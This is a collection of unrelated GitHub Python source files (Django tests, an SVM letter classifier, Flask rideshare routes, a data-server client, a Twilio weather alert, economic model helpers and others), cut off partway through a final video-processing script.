setUp(self):\n self.producto = Producto.objects.create(\n nombre = \"Microfono\",\n descripcion = \"Negro\",\n precio=2000,\n activo=False\n )\n self.producto2 = Producto.objects.create(\n nombre = \"Microfono 2\",\n descripcion = \"Negro\",\n precio=2000\n )\n self.url_productos = reverse(\"productos\")\n self.client = Client()\n\n\n def test_suma(self):\n self.assertEqual(suma(3, 9), 12)\n \n def test_productos_url(self):\n self.assertEqual(resolve(self.url_productos).func.view_class, ProductosView)\n \n def test_productos_creados(self):\n \n self.assertEqual(self.producto.nombre, \"Microfono\")\n\n def test_productos_get_status_code(self):\n response = self.client.get(self.url_productos)\n self.assertEqual(response.status_code, 200)\n\n def test_productos_get_context_products_inactivos(self):\n response = self.client.get(self.url_productos)\n self.assertNotIn(self.producto, response.context['productos'])\n\n def test_productos_get_context_products_activos(self):\n response = self.client.get(self.url_productos)\n self.assertIn(self.producto2, response.context['productos'])\n\n","repo_name":"DanielGtz/PythonFullStackVentas","sub_path":"ventas/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":7256,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"21520466394","text":"from Img import Img\nfrom sklearn import svm, preprocessing\nimport numpy as np\nfrom random import randint\nfrom PIL import Image\nimport os\nimport pickle as pk\n\nclass Model():\n def __init__(self):\n self.classes = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\"]\n #opening the pickle and loading the model inside it\n try:\n pickle = open(\"model.pickle\", \"rb\")\n self.model = pk.load(pickle)\n except:\n print(\"WARNING: the model does not exist(might be due to not being trained)\")\n\n def train_test_split(self, size = 20):\n \"\"\"\n creates the data from the data/letters folder and returns x_train, y_train, x_test, y_test\n size(the precent of the test data that is taken from the whole data)\n \"\"\"\n x = [] #features\n y = [] #labels \n\n #extracts the data from the letters folder\n num_label = 0\n for folder in self.classes:\n folder_len = os.listdir(f\"data/letters/{folder}\")\n folder_len = [file for file in folder_len if \".png\" in file]\n folder_len = len(folder_len)\n for i in range(folder_len):\n letter_img = Image.open(f\"data/letters/{folder}/{i}.png\") #gets the image\n letter_img = np.asarray(letter_img, dtype = np.float64) #converts the image to a numpy array\n x.append(letter_img)\n y.append(self.classes.index(folder))\n num_label += 1\n\n #suffles the data\n for i in range(len(x)*10):\n r_i = randint(0, len(x) - 1) #creates a random index to pop from the list\n #pops same element from x and y\n pop_x = x.pop(r_i)\n pop_y = y.pop(r_i)\n #appends each popped element to each corresponding list\n x.append(pop_x)\n y.append(pop_y)\n\n percent_split = int((size * len(x)) / 100)\n\n \n #splits the data to train and test data\n x_train = np.array(x[:-percent_split])\n y_train = np.array(y[:-percent_split])\n x_test = np.array(x[percent_split:])\n y_test = np.array(y[percent_split:])\n \n return(x_train, y_train, x_test, y_test)\n\n def fit(self):\n \"\"\"trains the model on the data\"\"\"\n x_train, self.y_train, x_test, self.y_test = self.train_test_split()\n #flattens the arrays of the images 35x35->1225\n flat_x_train = [im.flatten() for im in x_train]\n flat_x_test = [im.flatten() for im in x_test]\n self.x_train = np.array(flat_x_train)\n self.x_test = np.array(flat_x_test)\n\n #defining and training the model\n self.model = svm.SVC(gamma = \"auto\", kernel = \"poly\", tol = 1e-8) #defines the model\n self.model.fit(self.x_train, self.y_train)\n accuracy = self.model.score(self.x_test, self.y_test)\n\n #opens the file with the setting of writing in binary and saves the trained model\n with open(\"model.pickle\", \"wb\") as f:\n pk.dump(self.model, f)\n\n return(accuracy)\n\n def predict(self, img_path):\n \"\"\"predicts a given picture of a word and returns the prediction\"\"\"\n img = Img(img_path)\n letters = img.preprocess()\n word = \"\"\n #runs throught each letter, predicts them and adds each to the word\n for letter in letters:\n letter = letter.flatten()\n letter = letter.reshape(1, -1)\n prediction = self.model.predict(letter)\n word += self.classes[prediction[0]] #\"prediction[0]\" because the prediction comes out as an array\n\n return(word)","repo_name":"PLAZMAMA/Word_Reader","sub_path":"code_files/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":3687,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"28085594348","text":"from .atcoder import AtcoderMatcher\nfrom .topcoder import TopcoderMatcher\nfrom .yukicoder import YukicoderMatcher\n\n\ndef classify_urls_by_contest_sites(urls: list) -> dict:\n \"\"\"\n Classify urls by contest sites.\n :param urls: list of urls\n :return: dict of urls classified by contest sites\n \"\"\"\n contest_sites = [AtcoderMatcher, YukicoderMatcher, TopcoderMatcher]\n classified_urls = {contest_site._key_name: [] for contest_site in contest_sites}\n classified_urls[\"others\"] = []\n\n for url in urls:\n matched = False\n for contest_site in contest_sites:\n if contest_site.match(url):\n classified_urls[contest_site._key_name].append(url)\n matched = True\n break\n if not matched:\n classified_urls[\"others\"].append(url)\n\n return classified_urls\n","repo_name":"edge2992/prog_shojin_util","sub_path":"prog_shojin_util/utils/contest_sites/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39465284150","text":"import datetime\r\nimport functools\r\nfrom turtle import title\r\nimport uuid\r\nfrom flask import Blueprint, flash, redirect, render_template, current_app, url_for, session\r\nfrom .models import RideSchema, UserSchema, UserSchema\r\nfrom .forms import RideForm, RegistrationForm, LoginForm\r\nfrom dataclasses import asdict, dataclass\r\nfrom passlib.hash import pbkdf2_sha256\r\n\r\npages = Blueprint(\r\n \"pages\", __name__, template_folder=\"templates\", static_folder=\"static\"\r\n)\r\n\r\ndef login_required(route):\r\n @functools.wraps(route)\r\n def route_wrapper(*args, **kwargs):\r\n if session.get(\"email\") is None:\r\n return redirect(url_for(\".login_user\"))\r\n\r\n return route(*args, **kwargs)\r\n\r\n return route_wrapper\r\n\r\n\r\n# /API_test\r\n# General case HTML test template\r\n@pages.route(\"/API_test\")\r\ndef test_page():\r\n return render_template(\r\n template_name_or_list=\"api_test.html\")\r\n\r\n\r\n# /\r\n# Index (Home page) Route Endpoint\r\n@pages.route(\"/\")\r\n@login_required\r\ndef index():\r\n available_rides = current_app.db.rides_collection.find(\r\n {\"completion_status\": {\"$ne\": \"true\"}})\r\n ret_available_rides = [RideSchema(**ride) for ride in available_rides]\r\n return render_template(\r\n template_name_or_list=\"index.html\",\r\n title=\"Rides @ Grinnell College\",\r\n list_of_available_rides=ret_available_rides)\r\n\r\n# /add_ride\r\n# Endpoint to request_ride\r\n\r\n\r\n@pages.route(\"/request_ride\", methods=[\"GET\", \"POST\"])\r\n@login_required\r\ndef request_ride():\r\n form = RideForm()\r\n\r\n if form.validate_on_submit():\r\n input_ride_info = RideSchema(\r\n _id=uuid.uuid4().hex,\r\n requester_name=session.get(\"username\"),\r\n request_date=datetime.datetime.combine(\r\n form.req_date.data, datetime.time()),\r\n request_time=form.req_time.data,\r\n request_destination=form.req_dest.data,\r\n round_trip=form.rnd_trip.data,\r\n offered_compensation=form.compensation.data,\r\n datetime_flexibility=form.dtime_flexibility.data,\r\n additional_comments=form.cmnt.data\r\n )\r\n\r\n current_app.db.rides_collection.insert_one(asdict(input_ride_info))\r\n\r\n current_app.db.registered_users.update_one(\r\n {\"_id\": session[\"user_id\"]},\r\n {\"$push\": {\"rides_requested_by_user\": input_ride_info._id}}\r\n )\r\n\r\n return redirect(url_for('.index'))\r\n\r\n return render_template(\r\n template_name_or_list=\"new_ride.html\",\r\n title=\"Rides @ Grinnell - Request a ride\",\r\n form=form)\r\n\r\n# /register\r\n# Endpoint to register user\r\n\r\n\r\n@pages.route(\"/register\", methods=[\"GET\", \"POST\"])\r\ndef register_user():\r\n if session.get(\"email\"):\r\n return redirect(url_for('.index'))\r\n\r\n registration_form = RegistrationForm()\r\n\r\n if registration_form.validate_on_submit():\r\n user_registration_data = UserSchema(\r\n _id=uuid.uuid4().hex,\r\n user_email=registration_form.email.data,\r\n username=registration_form.name.data,\r\n user_password=pbkdf2_sha256.hash(registration_form.pwd.data)\r\n )\r\n\r\n current_app.db.registered_users.insert_one(\r\n asdict(user_registration_data))\r\n flash(\"User registered successfully\")\r\n return redirect(url_for('.login_user'))\r\n\r\n return render_template(\r\n template_name_or_list=\"register.html\",\r\n title=\"Rides @ Grinnell - Register\",\r\n registration_form=registration_form\r\n )\r\n\r\n\r\n# /login\r\n# Endpoint to login user\r\n@pages.route(\"/login\", methods=[\"GET\", \"POST\"])\r\ndef login_user():\r\n if session.get(\"email\"):\r\n return redirect(url_for(\".index\"))\r\n\r\n login_form = LoginForm()\r\n\r\n if login_form.validate_on_submit():\r\n user_data = current_app.db.registered_users.find_one(\r\n {\"user_email\": login_form.email.data})\r\n\r\n if not user_data:\r\n flash(\"User with the email address not found\", category=\"danger\")\r\n return redirect(url_for('.login_user'))\r\n\r\n user = UserSchema(**user_data)\r\n\r\n if user and pbkdf2_sha256.verify(login_form.pwd.data, user.user_password):\r\n session[\"user_id\"] = user._id\r\n session[\"username\"] = user.username\r\n session[\"email\"] = user.user_email\r\n return redirect(url_for('.index'))\r\n\r\n flash(\"Incorrect login credentials\")\r\n\r\n return render_template(\r\n template_name_or_list=\"login.html\",\r\n title=\"Rides @ Grinnell - Login\",\r\n login_form=login_form\r\n )\r\n\r\n# /logout\r\n# Endpoint to logout the user\r\n\r\n\r\n@pages.route(\"/logout_user\")\r\n@login_required\r\ndef logout():\r\n session.clear()\r\n return redirect(url_for('.login_user'))\r\n\r\n# /my_rideshare_accout\r\n# Endpoint to the user's account\r\n\r\n\r\n@pages.route(\"/my_account/\")\r\n@login_required\r\ndef my_account(_id: str):\r\n load_user_data = current_app.db.registered_users.find_one(\r\n {\"user_email\": session[\"email\"]})\r\n user_data = UserSchema(**load_user_data)\r\n\r\n load_ride_data = current_app.db.rides_collection.find(\r\n {\"_id\": {\"$in\": user_data.rides_requested_by_user}})\r\n rides_data = [RideSchema(**ride) for ride in load_ride_data]\r\n\r\n account_name = user_data.username\r\n return render_template(\r\n template_name_or_list=\"my_account.html\",\r\n title=f\"Rides @ Grinnell - {account_name}\",\r\n list_of_requested_rides=rides_data)\r\n\r\n\r\n# /my_account/<_id:uuid.uuid4.hex()>/delete_ride\r\n@pages.route(\"/my_account//delete_ride/\")\r\n@login_required\r\ndef delete_ride(user_id:str,ride_id:str):\r\n current_app.db.rides_collection.delete_one({\r\n \"_id\":ride_id\r\n })\r\n\r\n return redirect(url_for('.my_account',_id=user_id))\r\n ","repo_name":"sauryanshu55/rideshare-at-grinnell","sub_path":"rideshare_app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"22079763159","text":"import requests as req\nimport pandas as pd\nimport json\nimport os.path\nfrom typing import List\n\nfrom PyLagoon.config import LagoonConfig\nfrom PyLagoon.postgresql import PGMeta, build_sql_query\nfrom PyLagoon.source import Source\n\n\nclass Lagoon:\n def __init__(self, config, host=None, port=None):\n \"\"\"\n Connects to lagoon-server. config is a LagoonConfig\n \"\"\"\n\n self.__host = host if host else config.LAGOON_HOST\n self.__port = port if port else config.LAGOON_PORT\n self.__conn_str = \"http://{0}:{1}/\".format(self.__host, self.__port)\n self.__cfg = config\n self.__cookies = None\n if self.__cfg.is_connected_mode:\n self.__cookies = self.__connect()\n\n def __connect(self):\n reply = req.post(\n self.conn_str + \"user/login\",\n json={\"user\": self.__cfg.USER, \"pass\": self.__cfg.PASSWORD},\n )\n if reply.ok:\n return reply.cookies\n else:\n raise Exception(\"Authentication failed\")\n\n @property\n def is_authenticated(self):\n return self.__cookies != None\n\n @property\n def conn_str(self):\n return self.__conn_str\n\n def sources(self, ontoClass=None, tags=None, columns=None, **kwargs):\n \"\"\"args can be name, ix, user, createrAfter, createrBefore, ontoClass, group, etc.\n Use ontoClass instead of class, as it is a reserved python keyword\"\"\"\n if ontoClass:\n kwargs[\"class\"] = ontoClass\n if tags:\n kwargs[\"tag\"] = tags\n if columns:\n kwargs[\"columns\"] = columns\n reply = req.get(self.conn_str + \"sources\", params=kwargs, cookies=self.__cookies)\n return [Source(j) for j in reply.json()]\n\n def ingest(self, file_path, name, ontoClass=None, tags=None, **kwargs):\n \"\"\"\n Uploads a new dataset to the server.\n\n The available options are the same than for the REST interface of lagoon.\n Returns the newly created Source.\n \"\"\"\n if ontoClass:\n kwargs[\"class\"] = ontoClass\n if tags:\n kwargs[\"tag\"] = tags\n kwargs[\"name\"] = name\n kwargs[\"input\"] = os.path.split(file_path)[1]\n # So the server can guess the fileType\n reply = req.post(\n self.conn_str + \"sources\",\n data=open(file_path, \"rb\"),\n params=kwargs,\n stream=True,\n cookies=self.__cookies,\n )\n report = (json.loads(line.decode(\"utf-8\")) for line in reply.raw)\n stack = []\n last = None\n for e in report:\n if last:\n print(\"Status: \" + str(last))\n last = None\n if isinstance(e, dict) and e.get(\"start\"):\n stack.append(e[\"start\"])\n elif isinstance(e, dict) and e.get(\"notice\"):\n print(e[\"notice\"])\n elif isinstance(e, str):\n finished = stack.pop()\n if e == \"ok\":\n print(\"Done: \" + finished)\n else:\n raise Exception(\"Ingest signalled \" + str(e) + \" when \" + finished)\n else:\n last = e\n return Source(last)\n\n def my_sources(self, **kwargs):\n \"\"\"A shortcut for self.sources(name=)\"\"\"\n return self.sources(user=self.__cfg.USER, **kwargs)\n\n def users(self):\n \"\"\"Get a list of the users\n TODO: Fix it!\"\"\"\n reply = req.get(self.conn_str + \"users\")\n return reply.json()\n\n def download_source(self, source):\n \"\"\"Constructs a DataFrame containing an entire source\n \"\"\"\n is_json = any(c[\"type\"][0] == \"JSON\" for c in source.columns)\n if is_json:\n # We need a JSON document in that case\n # the sql endpoint will return one\n meta = PGMeta([source])\n table = meta[source]\n return self.__tbl_from_raw_sql(build_sql_query(meta.query(table)))\n else:\n reply = req.get(\n self.conn_str + \"source/\" + str(source.ix) + \"/download\",\n stream=True,\n cookies=self.__cookies,\n )\n if reply.ok:\n return pd.read_csv(reply.text)\n\n def download_query(self, query, sources):\n \"\"\"Constructs a DataFrame from a SQLAlchemy query and corresponding sources\n\n Note that this method will sequentially search for each columns type in the list\n of sources and take the first match. This is necessary since query results only\n include column names and not data source identifiers.\n \"\"\"\n return self.__tbl_from_raw_sql(build_sql_query(query), sources)\n\n def __tbl_from_raw_sql(self, query, sources):\n reply = req.post(\n self.conn_str + \"sql\", json={\"sql\": query}, stream=True, cookies=self.__cookies\n )\n reply.raise_for_status()\n return _query_to_df(reply.json(), sources)\n\n\ndef _group_rows(rows: List[dict]):\n columns = {}\n for row in rows:\n for c, v in row.items():\n if c in columns:\n columns[c].append(v)\n else:\n columns[c] = [v]\n return columns\n\n\ndef _get_dtype(col_name, sources):\n for source in sources:\n if col_name in source.col_types:\n return source.col_types[col_name]\n return object\n\n\ndef _query_to_df(rows, sources):\n grouped = _group_rows(rows)\n col_names = list(grouped.keys())\n series = []\n for name in col_names:\n vals = grouped.pop(name)\n series.append(pd.Series(vals, name=name, dtype=_get_dtype(name, sources)))\n df = pd.concat(series, axis=1)\n df.columns = col_names\n return df\n","repo_name":"tweag/lagoon","sub_path":"clients/PyLagoon/PyLagoon/lagoon.py","file_name":"lagoon.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"43"} +{"seq_id":"28997598466","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nfrom arm_lib.srv import *\n\nimport numpy as np\nimport sys\nimport rospy\n\n\n\n\ndef rotate_translate_client(a,b,c,d,e,f,g):\n rospy.wait_for_service('rotation_translation') # Wait until a service becomes available\n\n try:\n rotate_translate= rospy.ServiceProxy('rotation_translation', rotateAndTranslate)\n #service defintions are a container for the request and respone type. 1 2 3\n resp1 = rotate_translate(a,b,c,d,e,f,g)\n\n rotated = np.round(np.array([resp1.h, resp1.i, resp1.j],dtype='float32'),2)\n \n print(\"after rotation and translation\")\n print(rotated)\n \n\n except rospy.ServiceException as e:\n print(\"Service call failed: %s\"%e)\n \nif __name__ == \"__main__\":\n if len(sys.argv) == 8:\n #vector inputs\n a, b, c= int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3])\n #angle inputs\n d, e, f = int(sys.argv[4]), int(sys.argv[5]), int(sys.argv[6])\n #translation d input\n g = int(sys.argv[7])\n else:\n sys.exit(1)\n rotate_translate_client(a, b, c, d, e, f, g)\n","repo_name":"melatdagnachew/RoboticsAssignment-1","sub_path":"Robotics-Assignment-1/src/ROSNode/src/arm_lib/scripts/vectorClient.py","file_name":"vectorClient.py","file_ext":"py","file_size_in_byte":1169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"24207652575","text":"#!/Users/slmlaptop/anaconda/bin/python\nimport webbrowser\nimport argparse\nstr1 = 'https://ieeexplore.ieee.org/search/searchresult.jsp?action=search&searchField=Search_All&matchBoolean=true&queryText='\n\nparser = argparse.ArgumentParser(description='Track papers on IEEE. Written by Liming Shi, Audio Analysis Lab, Aalborg University, Denmark. Contact: ls@create.aau.dk or limingshi12@foxmail.com')\nparser.add_argument('-j', nargs='*', default=[], help='The abbreviation of the journals and conferences, e.g., -j tsp spl')\nparser.add_argument('-c', action='store_true', help='Sorted by citations with sorting by newest as default.')\nparser.add_argument('-sc', nargs='*', default=[], help='Search content, e.g., -sc speech enhancement. The default is not specifying the content.')\nyear_range = ['2017', '2021']\nparser.add_argument('-tr', nargs=2, default=year_range, help='Time range of the searching results, e.g., -tr 2017 2021 (from 2017 to 2021). The default is 2017 to 2021.')\n\n\ndef get_options(args):\n str2 = ''\n str2 = str2 + '&highlight=true&returnType=SEARCH&matchPubs=true&'\n if args.c:\n str2 = str2 + 'sortType=paper-citations&'\n else:\n str2 = str2 + 'sortType=newest&'\n str2 = str2 + 'ranges=' + args.tr[0] + '_' + args.tr[1] + '_Year&'\n str2 = str2 + 'returnFacets=ALL&rowsPerPage=100&pageNumber=1'\n return str2\n\n\ndef AbbrevToFull(args):\n switcher = {'spl': 'IEEE Signal Processing Letters',\n 'tsp': 'IEEE Transactions on Signal Processing',\n 'taslp': 'IEEE/ACM Transactions on Audio, Speech, and Language Processing',\n 'pami': 'IEEE Transactions on Pattern Analysis and Machine Intelligence',\n 'jstsp': 'IEEE Journal of Selected Topics in Signal Processing',\n 'spm': 'IEEE Signal Processing Magazine',\n 'icassp': 'icassp',\n 'waspaa': 'waspaa'\n }\n if args.j:\n nI = len(args.j)\n keyword_str = switcher.get(args.j[0])\n keyword_str = keyword_str.replace(\" \", \"%20\")\n keyword_str = keyword_str.replace(\"/\", \"%2F\")\n str2 = ''\n str2 = str2 + '(%22Publication%20Title%22:' + keyword_str + ')'\n for i in range(1, nI):\n key = args.j[i]\n keyword_str = switcher.get(key)\n keyword_str = keyword_str.replace(\" \", \"%20\")\n keyword_str = keyword_str.replace(\"/\", \"%2F\")\n str2 = '(' + str2 + '%20OR%20%22Publication%20Title%22:' + keyword_str + ')'\n else:\n # pick selected journal/conference to search as default\n journal_list = ['taslp', 'spl', 'tsp', 'jstsp', 'spm', 'icassp', 'waspaa']\n keyword_str = switcher.get(journal_list[0])\n keyword_str = keyword_str.replace(\" \", \"%20\")\n keyword_str = keyword_str.replace(\"/\", \"%2F\")\n str2 = ''\n str2 = str2 + '(%22Publication%20Title%22:' + keyword_str + ')'\n for i in range(1, len(journal_list)):\n key = journal_list[i]\n keyword_str = switcher.get(key)\n keyword_str = keyword_str.replace(\" \", \"%20\")\n keyword_str = keyword_str.replace(\"/\", \"%2F\")\n str2 = '(' + str2 + '%20OR%20%22Publication%20Title%22:' + keyword_str + ')'\n if args.sc:\n keyword_str = ' '.join(args.sc)\n keyword_str = keyword_str.replace(\" \", \"%20\")\n str2 = '(' + str2 + '%20AND%20%22All%20Metadata%22:' + keyword_str + ')'\n return str2\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n # Abbreviation=args.Abbreviation\n str2 = AbbrevToFull(args)\n str3 = get_options(args)\n webbrowser.open(str1 + str2 + str3)\n","repo_name":"LimingShi/research-tools","sub_path":"PythonTools/track_journal.py","file_name":"track_journal.py","file_ext":"py","file_size_in_byte":3455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"22176670378","text":"import sys\nimport string\n\nlast_cited = None\ncur_location = \"-\"\nciting_id_list = []\n\nfor line in sys.stdin:\n cited, citing, location = [x.strip() for x in line.split('\\t')]\n if not last_cited or last_cited == cited:\n last_cited = cited\n if location and location != \"-\":\n cur_location = location\n else:\n citing_id_list.append(citing)\n # print ('%s\\t%s\\t%s' % (cited,cited,location))\n elif cited != last_cited:\n for citing1 in citing_id_list:\n print ('%s,%s,%s' % (last_cited,citing1,cur_location))\n last_cited = cited\n cur_location = \"-\"\n citing_id_list = []\n if location and location != \"-\":\n cur_location = location\n else:\n citing_id_list.append(citing)\n\nfor citing1 in citing_id_list:\n print ('%s,%s,%s' % (last_cited,citing1,location))","repo_name":"vandana28/CSCI-5253-Datacenter-Scale-Computing-Assignments","sub_path":"lab3-hadoop-join-patent-vandana28-master/LAB3/reducer1.py","file_name":"reducer1.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"17750920891","text":"from ..utils.decorators import Private\n\nclass Withdraw:\n\n def __init__(self):\n pass\n\n\n @Private\n def create_withdraw(self, asset: str, bank: int, agency: int, account: int,\n type: str, amount: float, tfa: str) -> dict:\n body = {\n 'asset':asset,\n 'bank':bank,\n 'agency':agency,\n 'account':account,\n 'type': type,\n 'amount': amount,\n 'tfa': tfa\n }\n response = self.make_request('post', '/private/wallet/withdraw', body)\n return response\n \n\n @Private\n def list_withdraw(self, page=None, begin=None, end=None, search=None, asset=None, status=None) -> dict:\n body = {\n 'page': page,\n 'begin': begin,\n 'end': end,\n 'search': search,\n 'asset': asset,\n 'status': status\n }\n body = self.check_required_params(body)\n response = self.make_request('get', '/private/wallet/withdraw', body)\n return response\n \n\n @Private\n def get_withdraw_info(self, id_withdraw: int) -> dict:\n response = self.make_request('get', f'/private/withdraw/{id_withdraw}', {})\n return response\n \n\n @Private\n def download_withdraw_receipt(self, withdraw_id: int, name_file: str) -> dict:\n response = self.make_request('get', f'/private/wallet/withdraw/{withdraw_id}/receipt/{name_file}', {})\n return response\n \n\n \n ","repo_name":"kamoney/sdk_python","sub_path":"kamoney_sdk/endpoints_private/withdraw.py","file_name":"withdraw.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"3534712139","text":"from twilio.rest import Client\nfrom decouple import config\nimport requests\n\nweather_api_key = config(\"weather_api_key\")\nMY_LAT = 40.760780\nMY_LONG = -111.891045\ntwilio_account_id = config(\"twilio_account_id\")\ntwilio_auth_token = config(\"twilio_auth_token\")\ntwilio_number = config(\"twilio_phone_number\")\n\n\n\nparameters = {\n \"lat\": MY_LAT,\n \"lon\": MY_LONG,\n \"appid\": weather_api_key,\n \"exclude\": \"current,minutely,daily\"\n}\n\nweather_response = requests.get(\"https://api.openweathermap.org/data/2.5/onecall\", params=parameters) \nweather_response.raise_for_status()\nweather_data = weather_response.json()\nhourly_weather = weather_data[\"hourly\"]\n\ngonna_rain = False\nfor hour in range(0, 12):\n if hourly_weather[hour][\"weather\"][0][\"id\"] < 700:\n gonna_rain = True\n\nif gonna_rain:\n print(\"It gonna rain\")\n \n\n\n\nclient = Client(twilio_account_id, twilio_auth_token)\n\nmessage = client.messages \\\n .create(\n body=\"Join Earth's mightiest heroes. Like Kevin Bacon.\",\n from_=twilio_number,\n to='+1 651 308 4855'\n )\nprint(message.status)\n\n","repo_name":"pfvatterott/Udemy-Python","sub_path":"Section35KeysAuthAndEnv/316TwilioSMS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"15819619247","text":"import numba as nb\nimport numpy as np\nimport utils\nfrom GEModelTools import lag, lead\n\n\n@nb.njit\ndef chain_price_index(P, ssP, Y, P1, ssP1, Y1, P2, ssP2, Y2, T, sign=1.0):\n for t in range(T):\n if t==0:\n Y[t] = (ssP1 * Y1[t] + sign*(ssP2 * Y2[t]))/ssP\n else:\n Y[t] = (P1[t-1] * Y1[t] + sign*(P2[t-1] * Y2[t]))/P[t-1]\n P[t] = (P1[t] * Y1[t] + sign*(P2[t] * Y2[t]))/Y[t]\n\n\n@nb.njit\ndef CES_demand(c, PH, PF, P, eta, alpha, c_bar=0.0):\n cF = alpha * (PF/P)**(-eta) * (c - c_bar*PF/P) + c_bar \n cH = (1-alpha) * (PH/P)**(-eta) * (c - c_bar*PF/P)\n return cF, cH\n\n\n@nb.njit\ndef CES_demand_3_inputs(X, PH, PNT, PF,PX, eta, Theta_T, Theta_NT, Theta_M):\n XT2T = Theta_T * (PH/PX)**(-eta) * X \n XNT2T = Theta_NT * (PNT/PX)**(-eta) * X\n XM2T = Theta_M * (PF/PX)**(-eta) * X\n return XT2T, XNT2T, XM2T\n\n\n@nb.njit\ndef get_intermediates(XT, XNT, PXT, PXNT, PH, PNT, PF, Theta_T, Theta_NT, etaX): \n XT2T, XNT2T, XM2T = CES_demand_3_inputs(XT, PH, PNT, PF, PXT, etaX, Theta_T[0], Theta_T[1], Theta_T[2]) # intermediate demand in tradeable sector\n XNT2NT, XT2NT = CES_demand(XNT, PH, PNT, PXNT, etaX, Theta_NT[0]) # intermediate demand in non-tradeable sector\n return XT2NT, XNT2T, XNT2NT, XT2T, XM2T\n\n@nb.njit\ndef CES_demand_T(C, PT, PNT, P, etaT, alphaT, c_bar=0.0):\n CT = alphaT * (PT/P)**(-etaT) * (C - c_bar*PT/P) + c_bar \n CNT = (1-alphaT) * (PNT/P)**(-etaT) * (C - c_bar*PNT/P) \n return CT, CNT\n\n@nb.njit\ndef Armington(PH_s, PF_s, C_s, gamma, alpha):\n CH_s = alpha * (PH_s/PF_s)**(-gamma) * C_s\n return CH_s\n\n@nb.njit\ndef Price_index(PH, PF, eta, alpha):\n if utils.isclose(eta,1.0):\n P = PF**alpha * PH**(1-alpha)\n else:\n P = (alpha*PF**(1-eta) + (1-alpha)*PH**(1-eta))**(1/(1-eta))\n return P\n\n@nb.njit\ndef Price_index_T(PH, PNT, PF, etaX, X_share_T):\n if utils.isclose(etaX,1.0):\n PXT = PH**X_share_T[0] * PNT**X_share_T[1] * PF**X_share_T[2]\n else:\n PXT = (X_share_T[0]*PH**(1-etaX) + X_share_T[1]*PNT**(1-etaX) + X_share_T[2]*PF**(1-etaX))**(1/(1-etaX))\n return PXT\n\n@nb.njit\ndef Price_index_NT(PH, PNT, etaX, X_share_NT):\n if utils.isclose(etaX,1.0):\n PXNT = PNT**X_share_NT[0] * PH**X_share_NT[1] \n else:\n PXNT = (X_share_NT[0]*PNT**(1-etaX) + X_share_NT[1]*PH**(1-etaX))**(1/(1-etaX))\n return PXNT\n\n@nb.njit\ndef sol_Price_index_rel(pF, eta, alpha):\n if utils.isclose(eta,1.0):\n pH = (1.0/(pF**alpha))**(1/(1-alpha))\n else:\n pH = ((1.0-alpha*pF**(1-eta))/(1-alpha))**(1/(1-eta))\n return pH\n\n\n@nb.njit\ndef sol_Price_index2(pH, pF, eta, alpha):\n if utils.isclose(eta,1.0):\n pF = (1.0/(pH**(1-alpha)))**(1/alpha)\n else:\n pF = ((1.0-(1-alpha)*pH**(1-eta))/alpha)**(1/(1-eta))\n return pF\n\n@nb.njit\ndef Inf(P, ssval):\n P_lag = lag(ssval,P) \n pi = P/P_lag - 1\n pi_p = lead(pi,0)\n return pi, pi_p\n\n@nb.njit\ndef P_from_inf(P, inf, T, ssP):\n for t in range(T):\n if t == 0:\n P[t] = ssP*(1+inf[t]) \n else:\n P[t] = P[t-1]*(1+inf[t]) \n\n\n@nb.njit\ndef Get_HH_A(A, C, I, ra, T, ss):\n for t in range(T): \n if t==0:\n A[t] = ss.A * (1+ra[t]) + I[t] - C[t] \n else:\n A[t] = A[t-1] * (1+ra[t]) + I[t] - C[t] \n \n\n@nb.njit \ndef sol_backwards_lin(var, ssvar, a, b, T):\n for tt in range(T):\n t = T-1-tt\n if t == T-1:\n var[t] = ssvar\n else:\n var[t] = a[t] + b[t] * var[t+1] \n \ndef sol_backwards(var, ssvar, par, f, *args):\n for tt in range(par.T):\n t = par.T-1-tt\n if t == par.T-1:\n var[t] = ssvar\n else:\n var[t] = f(t, var[t+1], *args) \n\ndef sol_forwards(var, ssvar, par, f, *args):\n for t in range(par.T):\n if t == 0:\n var[t] = f(t, ssvar, *args)\n else:\n var[t] = f(t, var[t-1], *args) ","repo_name":"nWaldstrom/MultiSecSOEHANK","sub_path":"Model/Main/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"73108483971","text":"import cv2\nimport os\nimport numpy as np\nfrom tensorflow import keras\n\ndef load_test_images(folder_path):\n images = []\n for filename in sorted(os.listdir(folder_path)):\n if filename.endswith(\".jpg\"):\n img_path = os.path.join(folder_path, filename)\n img = cv2.imread(img_path)\n img = cv2.resize(img, (256, 144)) # Масштабируем изображение\n images.append(img)\n return np.array(images)\n\ndef convert_video_to_images(video_path, output_folder):\n # Проверяем, существует ли папка для сохранения изображений, и создаем ее, если она не существует\n if not 